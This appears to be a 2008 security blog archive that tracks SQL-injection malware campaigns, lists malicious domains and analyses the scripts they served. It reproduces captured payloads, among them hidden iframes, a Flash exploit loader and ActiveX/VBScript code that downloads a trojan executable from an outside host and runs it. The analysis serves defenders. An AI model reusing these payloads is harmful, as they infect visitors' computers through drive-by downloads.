new sql injected domain.
Strangely, the domain is currently not resolvable.
Archive for August, 2008
additional domains with hhr2ehght.com
Posted in sql injection on August 18, 2008 by s3cubelow are additional domains resolving to same IP address as hhr2ehght.com reported previously.
- ggqvehght.com
- eyigehght.com
- bbjvehght.com
www.bluexzz.cn/g.js
Posted in sql injection on August 12, 2008 by s3cuanother sql-injected domain.
/g.js redirects to /g.js?ckoafx=59812 which contain iframes of 14.htm and 456.htm
Content of 14.htm is a VBScript as follows:
Read more »
hhr2ehght.com/cgi-bin/index.cgi?mentat
Posted in sql injection on August 8, 2008 by s3cuAnother malicious domain. Other domains that resolve to same IP addresses are
- aykjfgves.com
- bkgpfgves.com
- busyfgves.com
- dmiafgves.com
- faj4ehght.com
- gfdpves.com
- hwh2ght.com
- iwi5fgves.com
other domains of jjmaobuduo.3322.org
Posted in sql injection on August 8, 2008 by s3cuThe domains below all belong to the same IP address which are used for injection.
- jjmaoduo.3322.org
- jjmaoduo2.3322.org
- plgou.com
- sdo.1000mg.cn
- www.plgou.com
- xxkk.net
- www3.800mg.cn (added 18 Aug 2008)
- www0.douhunqn.cn (added 23 Aug 2008)
- ppexe.com (added 23 Aug 2008)
- www.ppexe.com (added 23 Aug 2008)
jjmaobuduo.3322.org/csrss/w.js
Posted in sql injection on August 6, 2008 by s3cua new round of attacks haveĀ started.
w.js contains iframe src from http://www.plgou.com/csrss/htm.htm
htm.htm contains iframes from
- <iframe src=flash.htm width=100 height=0></iframe>
- <iframe src=06014.html width=100 height=0></iframe>
- <iframe src=yahoo.htm width=100 height=0></iframe>
- <iframe src=office.htm width=100 height=0></iframe>
- <iframe src=ksx.htm width=100 height=0></iframe>
flash.htm calls i1.html if browser is MSIE, else call f2.html (presumably firefox). Depending on the flashplay version the respective flash exploit is retrieved:
var version=deconcept.SWFObjectUtil.getPlayerVersion();if(version['major']==9){document.getElementById('flashversion').innerHTML="";if(version['rev']==115){var so=new SWFObject("./i115.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==64){var so=new SWFObject("./i64.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==47){var so=new SWFObject("./i47.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==45){var so=new SWFObject("./i45.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==28){var so=new SWFObject("./i28.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==16){var so=new SWFObject("./i16.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']>=124){if(document.getElementById){document.getElementById('flashversion').innerHTML=""}}}
document.write("")
Interesting content for ksx.htm:
<object classid="clsid:7E0CDEE7-DC80-4F37-9410-790BB5E9270E" codebase="http://www.plgou.com/csrss/rondll32.exe#version=1,0,0,1" width="800" height="191"></object>
infrequently used clsid for downloading trojan.
office.htm contains snapshot viewer exploit.
yahoo.htm uses exploits Yahoo Messenger to download trojan:
<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<script language='vbscript'>
test.GetFile "http://www.plgou.com/csrss/rondll32.exe","c:\\msyahoo.exe",5,1,"ti
any"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run"c:\\msyahoo.exe"
</script>
www.worldofwarcrokft.com/1/Office1.htm
Posted in sql injection on August 2, 2008 by s3cuas reported in the previous blog, this file seems to be reported by Symantec as a new attack vector.
Content of Office1.htm as follows
Read more »
